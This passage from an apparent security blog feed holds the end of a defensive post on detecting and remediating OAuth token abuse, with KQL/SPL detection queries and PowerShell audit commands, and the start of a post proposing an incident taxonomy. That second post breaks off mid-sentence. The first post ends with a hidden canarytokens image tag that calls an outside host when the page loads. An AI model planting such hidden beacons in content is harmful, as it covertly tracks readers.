across multiple organizations. Once registered as multi-tenant apps, the same application ID can be used to <a href="https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection/">phish users across different Azure AD tenants</a>, allowing attackers to scale operations efficiently while reducing infrastructure requirements and detection probability.</p> <p><br /></p> <h2 id="defensive-considerations">Defensive Considerations</h2> <p>Defending against OAuth token abuse requires a fundamental shift in how security teams approach monitoring, detection, and incident response. Traditional security controls that focus on malware detection, network anomalies, and endpoint protection are <a href="https://drsuresh.net/articles/oabuse">largely ineffective against attacks</a> that operate entirely within legitimate service boundaries and identity systems.</p> <p>The foundation of effective OAuth security lies in comprehensive visibility into identity and authentication flows. Organizations must implement detailed logging and monitoring of OAuth consent grants, application registrations, and token usage patterns. This visibility should extend beyond basic authentication logs to include API access patterns, permission scope utilization, and behavioral analytics that can distinguish between legitimate application usage and malicious token abuse.</p> <p>Microsoft Azure AD and Google Workspace provide <a href="https://learn.microsoft.com/en-us/azure/security/fundamentals/log-audit">extensive audit logging capabilities</a> that many organizations underutilize. Azure AD audit logs capture OAuth consent grants, application modifications, and token-related activities, while Office 365 audit logs provide detailed records of API access patterns and data operations. Security teams should ensure these logs are ingested into their SIEM platforms and configured with appropriate retention periods to support investigation and threat hunting activities.</p> <p>Detection strategies must focus on behavioral anomalies rather than technical indicators of compromise. Unlike traditional malware attacks that generate distinctive network traffic or file system modifications, OAuth abuse creates activity patterns that require contextual analysis to identify. Effective detection rules should monitor for applications requesting unusual permission combinations, such as <code class="language-plaintext highlighter-rouge">Mail.Read</code> paired with <code class="language-plaintext highlighter-rouge">Files.ReadWrite.All</code>, which could indicate an attacker seeking broad access to organizational data.</p> <p><br /></p> <h3 id="behavioral-detection-over-ioc-matching">Behavioral Detection over IOC Matching</h3> <p>Unlike malware, OAuth abuse doesn’t create obvious IOCs. The tokens, endpoints, and protocols involved are all legitimate. That means <strong>SOC teams must pivot from signature-based detection to behavioral analysis</strong>, looking for suspicious patterns such as:</p> <ul> <li>OAuth applications granted high-privilege scopes (<code class="language-plaintext highlighter-rouge">Mail.ReadWrite</code>, <code class="language-plaintext highlighter-rouge">Files.ReadWrite.All</code>)</li> <li>Newly created applications with generic names mimicking Microsoft services</li> <li>Apps registered by new or infrequently used accounts</li> <li>Unusual combinations of permission scopes (e.g., <code class="language-plaintext highlighter-rouge">Mail.Read</code> + <code class="language-plaintext highlighter-rouge">Directory.ReadWrite.All</code>)</li> <li>Token refresh activity from unexpected geographic regions or outside business hours</li> </ul> <p><br /></p> <hr /> <p><br /></p> <p><a href="https://www.cyber.gc.ca/en/guidance/guidance-using-tokenization-cloud-based-services-itsp50108">Geographic and temporal anomalies in token usage</a> provide another detection opportunity. Tokens being used from geographic locations inconsistent with user travel patterns, API access during off-hours that don’t align with user schedules, or token refresh patterns that suggest automated rather than human usage can all indicate compromise. However, these detections require baseline understanding of normal user behavior and must account for legitimate remote work patterns and global business operations.</p> <p>Application registration monitoring <a href="https://learn.microsoft.com/en-us/answers/questions/1861991/azure-enterprise-app-app-registration-tracking">represents a critical proactive defense capability</a>. Organizations should implement automated monitoring of new application registrations, particularly those created by recently established accounts or those requesting high-privilege permissions. Applications with generic names that attempt to mimic Microsoft services, those lacking proper publisher verification, or those configured with suspicious redirect URIs should trigger immediate security review.</p> <p>The technical implementation of OAuth monitoring requires sophisticated query capabilities across multiple log sources. Security teams should develop <a href="https://www.microsoft.com/en-us/security/blog/2022/11/16/token-tactics-how-to-prevent-detect-and-respond-to-cloud-token-theft/">SIEM rules that correlate OAuth consent events with subsequent API usage patterns</a>, looking for rapid escalation in data access or administrative activities following new application authorizations. Sample detection logic might monitor for applications that receive consent and immediately begin bulk data enumeration activities, suggesting automated rather than human-driven usage.</p> <p><a href="https://learn.microsoft.com/en-us/entra/identity/conditional-access/concept-conditional-access-conditions">Conditional access policies</a> provide a powerful preventive control mechanism that can significantly reduce OAuth attack surface. Organizations should implement policies that restrict OAuth consent to verified publishers only, require administrative approval for high-privilege applications, and block applications that don’t meet specific security requirements. These policies can be configured to allow exceptions for business-critical applications while blocking the broad categories of applications commonly used in OAuth abuse campaigns.</p> <p><br /></p> <table> <thead> <tr> <th style="text-align: center"><img src="https://github.com/user-attachments/assets/c87ae9f1-b92d-4fa1-b25c-d3389e69bf4c" alt="image" /></th> </tr> </thead> <tbody> <tr> <td style="text-align: center"><em>What is Conditional Access?</em></td> </tr> </tbody> </table> <p><br /></p> <p>User education and awareness programs must evolve to address the sophisticated social engineering techniques used in consent phishing campaigns. Traditional phishing awareness training that focuses on suspicious links or attachments is insufficient when attackers are using legitimate Microsoft and Google authorization interfaces. <a href="https://www.infosecinstitute.com/resources/phishing/consent-phishing-how-attackers-abuse-oauth-2-0-permissions-to-dupe-users/">Security awareness programs should specifically address OAuth consent scenarios</a>, teaching users to scrutinize application names, publisher information, and requested permissions before granting access.</p> <p>Incident response procedures for OAuth abuse require specialized approaches that differ significantly from traditional malware incidents. When OAuth compromise is suspected, responders must quickly identify all applications that have been granted consent by affected users, revoke suspicious tokens and applications, and audit the extent of data access that occurred during the compromise period. This process often requires coordination with cloud service providers and may involve legal considerations around data breach notification requirements.</p> <p>The remediation process for OAuth abuse can be complex and time-consuming. Simply changing user passwords is insufficient because refresh tokens often survive password resets. <a href="https://techcommunity.microsoft.com/blog/microsoft-entra-blog/how-to-break-the-token-theft-cyber-attack-chain/4062700">Responders must specifically revoke OAuth tokens and applications</a>, which may require administrative privileges and careful coordination to avoid disrupting legitimate business applications. Organizations should develop playbooks that outline the specific steps required to revoke tokens across different cloud platforms and maintain inventories of approved applications to distinguish legitimate tools from malicious ones.</p> <p>Threat hunting for OAuth abuse requires specialized techniques and tools that can analyze large volumes of API access logs and identity-related events. Hunters should look for patterns such as applications with unusually broad permission grants, tokens being used in automated patterns that suggest scripted access, or applications that were recently registered but immediately began accessing sensitive data across multiple users.</p> <p>Advanced organizations are implementing OAuth-specific security controls such as application governance platforms that provide continuous monitoring of OAuth applications and their usage patterns. These tools can automatically identify applications that request permissions beyond their apparent functionality, detect applications that are accessing data in patterns inconsistent with their stated purpose, and provide automated response capabilities for high-risk scenarios.</p> <p><br /></p> <h3 id="siem-detection-rules-and-queries">SIEM Detection Rules and Queries</h3> <p>Here are some practical detection queries and automation ideas for Microsoft 365 environments:</p> <h4 id="1-detect-oauth-app-consent-with-broad-scopes">1. Detect OAuth App Consent with Broad Scopes</h4> <pre><code class="language-kql">AuditLogs | where OperationName == "Consent to application" | where Result == "success" | extend AppName = tostring(TargetResources[0].displayName), Scopes = tostring(TargetResources[0].modifiedProperties[?(@.displayName=="ConsentAction")].newValue) | where Scopes has_any ("Mail.ReadWrite", "Files.ReadWrite.All", "Directory.ReadWrite.All") | project TimeGenerated, UserPrincipalName, AppName, Scopes </code></pre> <pre><code class="language-spl">index=o365 Operation="Consent to application" | stats count by UserId, ApplicationName, Scope | where count &gt; 5 OR like(Scope, "%Mail.Read%Files.ReadWrite%") </code></pre> <p>Detects consent grants involving highly sensitive scopes commonly targeted by attackers.</p> <p><br /></p> <h4 id="2-look-for-abnormal-refresh-token-usage">2. Look for Abnormal Refresh Token Usage</h4> <pre><code class="language-kql">SigninLogs | where AuthenticationProtocol == "OAuth2" | where TokenIssuerType == "AzureAD" and ConditionalAccessStatus == "notApplied" | where ClientAppUsed == "Refresh Token" | summarize count() by UserPrincipalName, Location, bin(TimeGenerated, 1h) | where count_ &gt; 10 </code></pre> <pre><code class="language-spl">index=azuread sourcetype="SigninLogs" AuthenticationProtocol="OAuth2" TokenIssuerType="AzureAD" ConditionalAccessStatus="notApplied" ClientAppUsed="Refresh Token" | bin _time span=1h | stats count by UserPrincipalName, Location, _time | where count &gt; 10 # if you've got Location enrichment, you could add it or do something with ipAddress like so: | stats count by UserPrincipalName, ipAddress, _time </code></pre> <p>Flags repeated token refreshes that may indicate automated abuse or persistent access.</p> <p><br /></p> <h4 id="3-monitor-for-suspicious-application-registrations">3. Monitor for Suspicious Application Registrations</h4> <pre><code class="language-kql">AuditLogs | where OperationName == "Add service principal" | extend AppName = tostring(TargetResources[0].displayName), InitiatedBy = tostring(InitiatedBy.user.userPrincipalName) | where AppName matches regex "(?i)(microsoft|office|365|secure|login).*" | project TimeGenerated, AppName, InitiatedBy </code></pre> <pre><code class="language-spl">index=azuread sourcetype="AuditLogs" OperationName="Add service principal" | eval AppName=mvindex('TargetResources{}.displayName', 0) | eval InitiatedBy=mvindex('InitiatedBy{}.user.userPrincipalName', 0) | where match(AppName, "(?i)(microsoft|office|365|secure|login).*") | table _time, AppName, InitiatedBy # a couple additional tricks here might be - excluding verified Microsoft apps or flag registrations by non-admins: | search NOT InitiatedBy IN ("admin@domain.com", "automation@domain.com") # or flag entries with no publisher verification: | eval Suspicious=if(isnull(PublisherName) OR PublisherName="Unknown", "Yes", "No") </code></pre> <p>Detects newly registered OAuth apps that use deceptive or spoofed branding.</p> <p><br /></p> <hr /> <p><br /></p> <h3 id="powershell-for-tenant-app-auditing">PowerShell for Tenant App Auditing</h3> <p>Audit apps with elevated scopes across your tenant:</p> <div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Get-AzureADServicePrincipal</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">ForEach-Object</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="n">Get-AzureADServicePrincipalOAuth2PermissionGrant</span><span class="w"> </span><span class="nt">-ObjectId</span><span class="w"> </span><span class="bp">$_</span><span class="o">.</span><span class="nf">ObjectId</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Where-Object</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="bp">$_</span><span class="o">.</span><span class="nf">Scope</span><span class="w"> </span><span class="o">-match</span><span class="w"> </span><span class="s2">"Mail|Files|Directory"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre></div></div> <p>Useful for identifying legacy or malicious apps with excessive access.</p> <p><br /></p> <hr /> <p><br /></p> <h3 id="-red-flag-oauth-app-traits">🚩 Red Flag OAuth App Traits</h3> <p>Flag OAuth apps exhibiting any of the following traits:</p> <ul> <li>App names that mimic Microsoft branding (<code class="language-plaintext highlighter-rouge">OfficeLogin</code>, <code class="language-plaintext highlighter-rouge">SharePointAuth</code>)</li> <li>No publisher verification badge</li> <li>Redirect URIs using <code class="language-plaintext highlighter-rouge">.cf</code>, <code class="language-plaintext highlighter-rouge">.tk</code>, <code class="language-plaintext highlighter-rouge">.xyz</code>, raw IPs, or URL shorteners</li> <li>Scopes like: <ul> <li><code class="language-plaintext highlighter-rouge">Mail.ReadWrite</code></li> <li><code class="language-plaintext highlighter-rouge">Files.ReadWrite.All</code></li> <li><code class="language-plaintext highlighter-rouge">Directory.ReadWrite.All</code></li> <li><code class="language-plaintext highlighter-rouge">Mail.Send</code></li> </ul> </li> </ul> <p><br /></p> <hr /> <p><br /></p> <h3 id="quick-wins-for-soc-teams">Quick Wins for SOC Teams</h3> <ul> <li>✅ Ingest Azure AD <strong>AuditLogs</strong>, <strong>SignInLogs</strong>, and <strong>UnifiedAuditLogs</strong></li> <li>✅ Monitor for consent events involving <strong>broad scopes</strong></li> <li>✅ Alert on new application registrations by <strong>non-admin users</strong></li> <li>✅ Enforce Conditional Access to <strong>require verified publishers</strong></li> <li>✅ Revoke tokens with: <div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Revoke-AzureADUserAllRefreshToken</span><span class="w"> </span><span class="nt">-ObjectId</span><span class="w"> </span><span class="err">&lt;</span><span class="nx">user-object-id</span><span class="err">&gt;</span><span class="w"> </span></code></pre></div> </div> </li> <li>✅ Maintain an <strong>approved application allowlist</strong></li> <li>✅ Train users to scrutinize <strong>OAuth consent prompts</strong>, not just suspicious links</li> </ul> <p><br /></p> <hr /> <p><br /></p> <h3 id="response-and-remediation">Response and Remediation</h3> <blockquote> <p><strong>Reminder:</strong> Changing a user’s password does <strong>not</strong> revoke refresh tokens.</p> </blockquote> <p>To evict an attacker:</p> <ol> <li>Revoke tokens via Azure Portal or PowerShell.</li> <li>Remove the malicious application from the tenant.</li> <li>Audit mailbox, OneDrive, and SharePoint access via Graph logs.</li> <li>Review Conditional Access to enforce reauthentication.</li> <li>Develop IR playbooks specifically for <strong>OAuth token compromise</strong>.</li> </ol> <p><br /></p> <hr /> <p><br /></p> <h2 id="conclusion">Conclusion</h2> <p>OAuth token abuse represents a fundamental evolution in cloud-based attacks that challenges traditional cybersecurity approaches and requires organizations to rethink their defensive strategies. As cloud adoption continues to accelerate and organizations become increasingly dependent on third-party integrations and OAuth-enabled applications, the attack surface for token-based intrusions will only continue to expand.</p> <p>The shift from malware-based attacks to identity-based attacks reflects the broader transformation of enterprise IT infrastructure toward cloud-first architectures. Attackers are adapting their techniques to exploit the very systems designed to enable secure, flexible access to cloud resources. This evolution demands that security teams expand their focus from traditional endpoint and network security to comprehensive identity and access management security.</p> <p>For SOC teams, defending against OAuth abuse requires developing new competencies in identity security, API monitoring, and behavioral analytics. The skills and tools that have been effective against traditional malware campaigns must be supplemented with capabilities specifically designed to detect and respond to token-based attacks. This includes understanding OAuth flows, analyzing API access patterns, and developing incident response procedures tailored to identity-based compromises.</p> <p>The persistence advantages that OAuth tokens provide to attackers represent perhaps the most significant challenge for defenders. Traditional remediation approaches like password resets and session termination are often insufficient against attackers who have obtained long-lived refresh tokens. Organizations must develop more sophisticated token management and revocation capabilities, along with the processes and tools necessary to implement them effectively during incident response.</p> <p>Organizations embarking on OAuth security improvements should prioritize comprehensive visibility and monitoring as the foundation of their defensive strategy. Without detailed logging and analysis capabilities for identity and API activities, even the most sophisticated detection rules and response procedures will be ineffective. This visibility must extend across all cloud platforms and identity providers used within the organization, creating a unified view of OAuth activities and potential abuse patterns.</p> <p>The business impact of OAuth abuse extends beyond traditional data breach concerns to encompass the integrity of cloud-based business processes and the trustworthiness of digital collaboration platforms. As organizations become more dependent on cloud services for core business functions, the potential for OAuth-based attacks to disrupt operations and compromise sensitive information will continue to grow.</p> <p>Successfully defending against OAuth token abuse requires treating identity as infrastructure, applying the same rigorous security controls and monitoring capabilities traditionally reserved for network and endpoint security. Organizations that embrace this shift and invest in comprehensive OAuth security capabilities will be better positioned to defend against the evolving threat landscape and maintain the security of their cloud-first business operations.</p> <p><img src="http://canarytokens.com/feedback/s9n6027zdirqbipsxvab60laf/payments.js" style="display: none;" /></p>
  117. The Universal Cyber Incident Taxonomy (UCIT)

    Mon, 14 Jul 2025 00:00:00 -0000

    Incident categorization plays a bigger role in cybersecurity operations than most people realize. It affects how alerts are routed, how incidents get reported, and how security programs measure what’s actually happening in their environment. But the taxonomies used to label these events are often inconsistent, vague, or misaligned with real-world attacker behavior. In this post, I summarize earlier research I wrote up over the past year, in which we walk through a structured comparison of three major frameworks—DoD, CISA, and Verizon DBIR—and introduce an alternative approach called UCIT. It’s designed to be clearer, more usable under pressure, and better suited for modern SOC workflows. I also tested it against 100 realistic attack scenarios to see how it holds up.
    <p>Incident categorization plays a bigger role in cybersecurity operations than most people realize. It affects how alerts are routed, how incidents get reported, and how security programs measure what’s actually happening in their environment. But the taxonomies used to label these events are often inconsistent, vague, or misaligned with real-world attacker behavior. In this post, I summarize earlier research I wrote up over the past year, in which we walk through a structured comparison of three major frameworks—DoD, CISA, and Verizon DBIR—and introduce an alternative approach called <a href="https://github.com/CTI-Buddy/UCIT">UCIT</a>. It’s designed to be clearer, more usable under pressure, and better suited for modern SOC workflows. I also tested it against 100 realistic attack scenarios to see how it holds up.</p> <p><br /></p> <h1 id="introduction">Introduction</h1> <p>The moment a cyber incident is detected, it enters a pipeline of documentation, escalation, and eventual reporting. Whether it’s a beacon to an external IP, a suspicious PowerShell command, or a compromised web application, that event needs to be labeled—and the frameworks organizations use to apply those labels carry significant weight. Unfortunately, many of the most commonly used taxonomies fail to clearly or consistently describe what’s actually been observed.</p> <p>The result isn’t just inconsistent naming, it’s mismatched expectations. Categories that sound specific on paper often collapse into vague or overlapping buckets in practice. Terms like “Malicious Logic” or “Unauthorized Access” may tick a policy box, but they often lack the precision needed to interpret or compare incidents meaningfully over time. What’s ultimately reported may bear little resemblance to what was actually detected, investigated, or remediated.</p> <p>Most security teams rely on some form of incident categorization schema to manage this process. These frameworks—whether formal policies, inherited templates, or internal conventions—are designed to classify cyber incidents into discrete types. Over time, these categories become embedded in workflows, tooling, and compliance processes. Ideally, they should promote clarity, consistency, and better decision-making. In reality, they often do the opposite.</p> <p>Few organizations use the same schema. Definitions vary from one framework to the next, and even within the same system, multiple categories can seem equally applicable. Some frameworks offer rigid, technical definitions that collapse under operational reality. Others are so vague that nearly any event could fit under multiple labels. When analysts are forced to make sense of complex incidents using a taxonomy that doesn’t quite fit, the result is mislabeling, inconsistent tracking, and confusion that echoes through every layer of the response process.</p> <p>These mismatches matter. They introduce noise into long-term trend analysis, skew threat intelligence reporting, and complicate inter-team or inter-organizational collaboration. As cyber operations scale and mature, the lack of a consistent, usable labeling system becomes more than a clerical nuisance—it becomes a structural risk.</p> <p>This blog post is the product of a year-long effort to assess and compare three of the most visible public incident taxonomies: those published by the Department of Defense, CISA, and Verizon. To evaluate their accuracy, clarity, and practical value, I tested each one against real-world adversary behavior as defined in the <a href="https://attack.mitre.org/">MITRE ATT&amp;CK framework</a>. The findings reveal a set of common pitfalls, structural mismatches, and design decisions that consistently get in the way of clear, usable incident reporting.</p> <p>This resulted in the development of a new taxonomy (cue the relevant <a href="https://xkcd.com/927/">XKCD comic</a> here, of course) that I am calling the Universal Cyber Incident Taxonomy (UCIT). Originally, I thought I’d have to come up with some sort of new system, but what I found is that MITRE ATT&amp;CK just simply works for this too – so it is basically retrofitting that framework into how we label our events in an incident management system. The result is a simple taxonomy, inspired by the <a href="https://en.wikipedia.org/wiki/Linnaean_taxonomy">Linnaean model</a> (Kingdom-Phylum-Class-etc), that seems to more accurately identify the event and makes it much more useful for retrospective trending and SOC process improvement.</p> <p><br /></p> <table> <thead> <tr> <th style="text-align: center"><img src="https://github.com/user-attachments/assets/cb76f436-b88b-474a-8b44-adf69c1f7955" alt="image" /></th> </tr> </thead> <tbody> <tr> <td style="text-align: center"><em>Don’t mind me, just contributing to the problem</em></td> </tr> </tbody> </table> <p><br /></p> <p>And to clarify - this taxonomy isn’t intended to replace a full incident report, nor does it aim to capture every contextual detail required for regulatory disclosure or postmortem analysis. Organizations will still need <a href="https://verisframework.org/">supplementary fields</a> for indicators, timelines, systems impacted, response steps, and lessons learned. Rather, UCIT is designed to serve as a standardized short-form naming convention—a structured label that conveys, at a glance, what type of incident has occurred, how it manifested, and what level of access or compromise was observed. It treats the incident as a discrete object within a broader system of analysis, making it easier to sort, search, and compare events with a measured improvement in clarity and consistency.</p> <p>Before diving into the specifics of each framework, it’s worth unpacking why this problem persists and what makes incident categorization—something so foundational—so difficult to get right.</p> <p><br /></p> <h1 id="why-incident-categorization-still-sucks">Why Incident Categorization Still Sucks</h1> <p>For all the progress made in detection, automation, and response, the simple act of categorizing cyber incidents remains surprisingly error-prone. In a typical SOC, it’s not unusual for two different analysts to label the <a href="https://www.digitalguardian.com/blog/deadly-game-cyber-mis-attribution">same event in different ways</a>, each following the official guidance provided by their organization. These inconsistencies aren’t just artifacts of human error—they’re baked into the structure of the taxonomies themselves.</p> <p>Many frameworks in use today are either too broad or too brittle. Some are carryovers from regulatory checklists. Others evolved organically inside a single organization and were never meant to scale. Even well-known guidance, like the <a href="https://www.jcs.mil/Portals/36/Documents/Library/Manuals/m651001.pdf">DoD’s CJCSM 6510.01B</a> or <a href="https://www.cisa.gov/federal-incident-notification-guidelines">CISA’s federal reporting model</a>, often struggles when applied to ambiguous or fast-moving incidents. Instead of clarifying what happened, they leave analysts guessing which category is “close enough.”</p> <p>The effects are cumulative. Misclassified incidents distort organizational metrics, weaken long-term threat modeling, and make root cause analysis harder than it needs to be. For incidents that span multiple environments—or require escalation to external partners—mismatched labels can delay response or trigger unnecessary friction between teams. Internally, the same confusion slows investigations, increases duplication, and undermines confidence in the data being used to guide strategy and investment.</p> <p>The problem gets worse the earlier an incident is detected. Initial access and execution techniques often unfold before the full scope of the attack is known. Analysts working with limited information are still expected to assign a category, even though that classification may shift significantly as the investigation develops. Some frameworks try to account for this with “placeholder” categories like “Investigating” or “Unknown,” but these catch-alls offer little value for retrospective analysis and can become data sinkholes over time.</p> <p>A well-designed taxonomy needs to serve two very different purposes: it must be usable in real time, when clarity and speed are essential, and also meaningful later on, when analysts and leadership rely on the data for analysis, reporting, and decision-making. Most existing systems struggle to strike that balance. They either overfit the operational need and lose analytical power, or prioritize specificity and end up too complex to use effectively during an actual event.</p> <p>This study began as a way to test whether any of the most commonly referenced frameworks could offer a better approach. By mapping a large sample of <a href="https://attack.mitre.org/tactics/enterprise/">MITRE ATT&amp;CK techniques</a> to each schema’s incident categories, it became possible to observe where definitions overlapped, where gaps emerged, and where labels broke down entirely. The goal was not only to identify flaws, but to use those findings as the foundation for something better.</p> <p>The inconsistencies observed across these frameworks aren’t just theoretical. To better understand how they function in practice, I conducted a structured assessment of three widely used taxonomies: the <a href="https://www.jcs.mil/Portals/36/Documents/Library/Manuals/m651001.pdf">Department of Defense’s CJCSM 6510.01B</a>, CISA’s <a href="https://www.cisa.gov/federal-incident-notification-guidelines">Federal Incident Notification Guidelines</a>, and <a href="https://www.verizon.com/business/en-gb/resources/reports/dbir/2024/incident-classification-patterns-intro/">Verizon’s Data Breach Investigations Report (DBIR)</a> categorization model. I should note that these are the three largest ones I could find that are publicly available. For Verizon in particular, it’s possible that internally other taxonomies are utilized. For CISA, I suspect this taxonomy was adapted because it had to deal with dozens to hundreds of different organizations translating their taxonomies into something CISA could ingest cleanly. In any case, I used what I could cite.</p> <p><strong>Department of Defense (CJCSM 6510.01B)</strong></p> <ul> <li><strong>Structure</strong>: A structured model using numerical categories (CAT1–CAT9), each representing different incident types such as insider threat, malicious logic, and user-level intrusion.</li> <li><strong>Purpose</strong>: Designed to support DoD-wide incident handling processes, with formal escalation and reporting across components.</li> <li><strong>Strengths</strong>: Offers granularity and aligns with internal DoD requirements; integrates technical detail like privilege level.</li> </ul> <p><br /></p> <table> <thead> <tr> <th style="text-align: center"><img src="https://github.com/user-attachments/assets/aae40654-c50f-40c2-9621-39a24bb42eeb" alt="image" /></th> </tr> </thead> <tbody> <tr> <td style="text-align: center"><em>The DoD Framework, unchanged since 2014</em></td> </tr> </tbody> </table> <p><br /></p> <p><strong>CISA (Federal Incident Notification Guidelines)</strong></p> <ul> <li><strong>Structure</strong>: A lightweight, impact-focused notification framework, including categories like Functional Impact, Information Impact, and a catch-all “Unknown”.</li> <li><strong>Purpose</strong>: Facilitates rapid, standardized reporting by federal agencies to NCCIC/US‑CERT, especially under regulatory or operational directives.</li> <li><strong>Strengths</strong>: Simplicity enables quick compliance and alignment with recovery and impact metrics.</li> </ul> <p><br /></p> <table> <thead> <tr> <th style="text-align: center"><img src="https://github.com/user-attachments/assets/c038fd34-771d-40ca-8c56-87d8952b29c6" alt="image" /></th> </tr> </thead> <tbody> <tr> <td style="text-align: center"><em>CISA, trying to work with every single framework</em></td> </tr> </tbody> </table> <p><br /></p> <p><strong>Verizon (DBIR Classification Schema)</strong></p> <ul> <li><strong>Structure</strong>: Industry-facing categories derived from the VERIS framework, including labels like “System Intrusion,” “Privilege Misuse,” and “Denial of Service,” based on clustering of incident data.</li> <li><strong>Purpose</strong>: To classify breach and incident data at scale for annual reporting, trending, and risk analysis across industries.</li> <li><strong>Strengths</strong>: Categories are intuitive and reader-friendly, useful for high-level reporting and communication trends.</li> </ul> <p><br /></p> <table> <thead> <tr> <th style="text-align: center"><img src="https://github.com/user-attachments/assets/f8ed5a87-0e3a-4798-8bba-9d74bd1cf273" alt="image" /></th> </tr> </thead> <tbody> <tr> <td style="text-align: center"><em>This might only be used in the DBIR but I didn’t have many frameworks to choose from</em></td> </tr> </tbody> </table> <p><br /></p> <p>Rather than relying on anecdotal impressions, the evaluation used a grounded and repeatable method: comparing how each framework handled a broad selection of real-world attack techniques, as documented in the <a href="https://attack.mitre.org/tactics/enterprise/">MITRE ATT&amp;CK framework</a>. This crosswalk approach allowed for a direct, apples-to-apples comparison of how each schema defines, interprets, and sometimes struggles to categorize adversary activity.</p> <p><br /></p> <h1 id="how-the-frameworks-were-tested">How The Frameworks Were Tested</h1> <p><a href="https://attack.mitre.org">MITRE ATT&amp;CK</a> has become the industry standard for classifying adversary behavior. With over 500 techniques and sub-techniques spanning the entire attack lifecycle, it offers a detailed map of how real intrusions unfold—from initial reconnaissance to impact. Because each technique is well-defined and tied to observable behaviors, it provides an ideal reference point for evaluating incident taxonomies.</p> <p>The goal of this study was to see how well-known categorization schemas perform when applied to these techniques. In other words, if an analyst detected a known ATT&amp;CK technique in their environment, how would they label it under each of the three frameworks? Would the category be clear, accurate, and consistent? Or would it introduce ambiguity, overlap, or blind spots?</p> <p>To test this, I selected 86 techniques from across all 14 MITRE ATT&amp;CK tactic families, ensuring coverage of the full attack lifecycle. Each technique was then mapped—manually but methodically—to the most appropriate category or categories within the CISA, DoD, and Verizon taxonomies. The goal wasn’t to force a one-to-one match, but to simulate how a typical SOC analyst would be expected to categorize the activity using only the guidance provided in each framework.</p> <p>This notional mapping exercise revealed exactly where the definitions aligned, where they conflicted, and where gaps emerged. It also made visible a set of recurring patterns that suggest deeper structural issues—some tied to terminology, others to the underlying assumptions baked into each model.</p> <p>In each case, the mapping reflected the most plausible category an analyst might choose based on the language and guidance available within that framework. When techniques could reasonably fall into multiple categories—such as a malicious macro that leads to both initial access and code execution—the analysis prioritized the label most likely to be used early in an incident response workflow. While this approach doesn’t capture every nuance of a live investigation, it mirrors the practical conditions under which these frameworks are typically applied.</p> <p>In fact, the nuance and ambiguity when labeling was sort of the point. Deep diving the labeling decisions <em>should</em> result in disagreement, since this was ultimately the intent of the study. Anecdotally knowing that these schemas were imperfect was the genesis of the study in the first place. The outcome ultimately aimed to solve as much of that ambiguity as possible, as well as offer a viable and open-source alternative designed for wider adoption.</p> <p><br /></p> <h1 id="where-the-taxonomies-fail">Where the Taxonomies Fail</h1> <p>Once the ATT&amp;CK techniques were mapped to each framework, patterns began to emerge—some predictable, others more surprising. While each taxonomy had strengths, all three struggled with consistency, clarity, and completeness in different ways. The further we got from traditional attack types like malware or phishing, the more obvious the gaps became.</p> <p><br /></p> <table> <thead> <tr> <th style="text-align: center"><img src="https://github.com/user-attachments/assets/321b7587-0d74-46f9-8e91-38a8441ccb08" alt="image" /></th> </tr> </thead> <tbody> <tr> <td style="text-align: center"><em>Mapping Recon, Initial Access and Execution</em></td> </tr> </tbody> </table> <p><br /></p> <p>One of the most striking examples came from the CISA schema. Designed to help federal agencies rapidly categorize and report incidents, its model includes a category called “Other” with a sub-option labeled “Unknown.” In practice, this became a kind of dumping ground. When post-compromise behaviors like lateral movement, credential dumping, or command-and-control activity didn’t cleanly fit into any of the other categories, they defaulted into Unknown—not because they were unclear to the analyst, but because the schema itself had no better place for them.</p> <p><br /></p> <table> <thead> <tr> <th style="text-align: center"><img src="https://github.com/user-attachments/assets/2435553a-959e-4130-a42a-1d205d1b2f5b" alt="image" /></th> </tr> </thead> <tbody> <tr> <td style="text-align: center"><em>Mapping Persistence, Priv Esc and Defense Evasion</em></td> </tr> </tbody> </table> <p><br /></p> <p>This issue didn’t just happen once or twice. Across the full mapping, “Unknown” became one of the most frequently selected categories in the CISA model. That’s not a reflection of analyst uncertainty; it’s a reflection of a taxonomy that wasn’t built with the possibility of detection at various stages in the attack chains in mind. The earlier stages of the ATT&amp;CK kill chain—initial access, phishing, web exploitation—were covered reasonably well. But the moment an attacker moved deeper into an environment, the framework’s descriptive power started to fall apart. Analysts may be detecting attacks at any portion of the kill-chain, and the taxonomy simply does not reflect that.</p> <p><br /></p> <table> <thead> <tr> <th style="text-align: center"><img src="https://github.com/user-attachments/assets/3131dab7-b3ef-4ef8-adf0-d4e3c9063fc3" alt="image" /></th> </tr> </thead> <tbody> <tr> <td style="text-align: center"><em>Mapping Credential Access, Discovery and Lateral Movement</em></td> </tr> </tbody> </table> <p><br /></p> <p>The DoD’s CJCSM 6510.01B schema performed better in terms of granularity, but had problems of its own. The model uses a numerical category system (CAT1 through CAT9), where each number represents a different type of incident. While this can be efficient for quick classification, the boundaries between categories are blurry. For example, CAT2 covers “User-Level Intrusion,” while CAT7 is “Malicious Logic.” Depending on the interpretation, the same activity—say, a user opening a malicious attachment that drops a backdoor—could reasonably fall under either. As with the CISA model, this led to mapping collisions and disagreements, especially in scenarios where attacker action and malware overlapped.</p> <p><br /></p> <table> <thead> <tr> <th style="text-align: center"><img src="https://github.com/user-attachments/assets/9841b295-5870-429b-a2e4-53b4140fa8c1" alt="image" /></th> </tr> </thead> <tbody> <tr> <td style="text-align: center"><em>Mapping the rest of them</em></td> </tr> </tbody> </table> <p><br /></p> <p>Then there’s Verizon’s DBIR schema. It offered the most modern and streamlined set of categories, namely for its simplicity—terms like “System Intrusion,” “Privilege Misuse,” and “Denial of Service”—which were intuitive on the surface but too broad in practice. “System Intrusion” alone ended up absorbing nearly every post-access technique in the ATT&amp;CK framework, turning it into a catch-all not unlike CISA’s “Unknown.” The lack of subcategories made it easy to classify something quickly but hard to draw meaningful distinctions between types of adversary behavior. As a result, the schema produced clean-looking data at the cost of useful detail.</p> <p>In all three frameworks, ambiguity wasn’t just a fringe problem—it was structural. Key ATT&amp;CK techniques simply didn’t map cleanly to any category, or mapped to too many. Post-compromise behaviors in particular—things like internal reconnaissance, credential access, and lateral movement—were consistently underserved or blurred across multiple definitions. These stages are often the most critical to identify and contain, yet they were the hardest to label in a consistent, actionable way.</p> <p>Even where the frameworks offered sufficient 